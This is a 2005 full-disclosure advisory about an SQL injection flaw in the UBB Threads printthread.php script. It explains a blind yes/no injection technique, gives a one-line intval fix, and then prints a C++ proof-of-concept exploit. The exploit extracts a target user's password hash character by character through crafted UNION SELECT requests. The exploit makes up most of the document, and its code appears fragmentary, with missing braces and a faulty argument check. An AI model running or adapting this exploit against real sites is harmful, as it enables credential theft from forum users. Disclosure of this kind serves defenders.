Date: 19 Apr 2005 20:40:03 -0000
From: Hillel Himovich <>
To: [email protected]Subject: UBB Thread printthread.php SQL Injection
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UBB Thread /ubbthreads/printthread.php SQL Injection Yes\No vulnerability
Full Disclosure
Bug discovered By: Axl
Exploit By: HLL (hllhll at
1. Introduction
There Is a flaw in printthread.php due to insufficient bound checking of the 'main' query parameter
wich allows a malicues SQL to be injected threw the querys
2. Description
The main query parameter is used twice in this page, in different queries and in different number of columbs
thus, the popular 'UNION SELECT' method will is not applicable, because a correct response of the first query, makes the
second query to be invalid, and because of that, any output that was is dismissed and an error message only for the second query is shown
The catch is, that the second query execution is conditional to the results of the first one
If no results are returned from the first query the second query is not processed, thus, no SQL error will output
So, as you see in the POC Exploit below this can be used to still use output from the first query
not as a text\numbers but as a "Are there any results" way.
If the fisrt query would have 0 rows returnd, there will be no SQL error
If at least 1 row is returned, then An SQL Error will show.
3. Solution
Add in the beginning of the PHP file(printthread.php) after the PHP-Code tag (<?):
if(array_key_exists('main', $_GET)) $_GET['main']=intval($_GET['main']);
4. Exploitation: See below
5. Credits
Vulnerability discovered by: Axl
Exploit Coded by HLL: hllhll <at>
4. Exploitation
UBB Thread /ubbthreads/printthread.php SQL Injection Yes\No vulnerability
Usage: HLLUBBThreadsExploit.exe <hostname> <path to printthread.php> <Any vaild forum name> <user id>
Example: HLLUBBThreadsExploit.exe /ubbthreads/printthread.php UBB3 2
Vulnerability discovered by: Axl
Exploit Coded by HLL: hllhll <at>
#include <winsock2.h>
#include <stdio.h>
#include <conio.h>
#include <iostream.h>
#pragma comment (lib,"ws2_32")
void usage(char *argv[])
cout << "[+] UBB Threads Proof-Of-Concept Exploit, Written by: HLL" << endl;
cout << "[+] Usage:" << endl;
cout << "[+] " << argv[0] << " <hostname> <path to printthread.php> <Any vaild forum name> <user name> " << endl;
cout << "[+] " << argv[0] << " /ubbthreads/printthread.php UBB3 HLL" << endl;
int main(int argc, char *argv[]){
WSADATA wsaData;
struct sockaddr_in saddr;
WSAStartup(MAKEWORD(1, 1), &wsaData);
struct hostent *h;
char hash[34]={0};
int rcvlen;
char ch;
int flag, pos;
int countwait;
SOCKET sock;
char req[400];
char buf[600];
char rcvbuf[10000];
char rcvtmpbuf[1024];
char *host=argv[1]; //Server
char *path=argv[2]; // Path to /ubbthreads/printthread.php
char *fname=argv[3]; //Forum name
int uid=atoi(argv[4]); //User id
if (argv!=5){
//Resolve address (will work also if this is an IP)
cout << "[+] Resolving host... ";
if (!(h=gethostbyname(host)))
cout << "FAILD!" << endl;
cout << "Done." << endl;
saddr.sin_addr=*(struct in_addr *)h->h_addr_list[0];
memset(saddr.sin_zero, 0, 8);
cout << "[+] Exploiting target... " << endl;
for (pos=1; pos<=32; pos++)
for (ch='0'; ch<='F'; ch++)
if ( (sock=socket(AF_INET, SOCK_STREAM, 0)) == -1 )
cout << "FAILD CREATING SOCKET!" << endl;
if (ch==':') ch='A'; //If finished all digits, jump to hex digits
//Prepare reqest
sprintf(req, "%s?Board=%s&type=post&main=-99'%%20UNION%%20SELECT%%20B_Number,B_Posted%%20FROM%%20w3t_Posts,w3t_Users%%20WHERE%%20((MID(U_Password,%d,1)='%c')", path, fname, pos, ch, pos, ch+32);
if (ch>='A' && ch<='Z')
sprintf(req, "%sOR%%20(MID(U_Password,%d,1)='%c')", req, pos, ch+32);
sprintf(req, "%s)AND(u_number=%d)/*", req, uid);
sprintf(buf, "GET %s HTTP/1.0\r\nAccept: * /*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)\r\nHost: %s \r\n\r\n", req, host);
connect(sock, (struct sockaddr *)&saddr, sizeof(struct sockaddr) );
send(sock, buf, strlen(buf), 0);
cout << "[+] Char: " << ch << endl;
//Loop untill disconnection or recognized string
if ((rcvlen = recv(sock, rcvtmpbuf, 1023, 0))>0){
strcat(rcvbuf, rcvtmpbuf);
if ( (++countwait) == 30)
if ( strstr(rcvbuf, "SQL Error"))
if (flag==1){ //Char found
cout << "[+] Char " << ch << " In pos " << pos << endl;
cout << endl << "The hash for user id" << uid << "is: " << hash << endl;
return (0);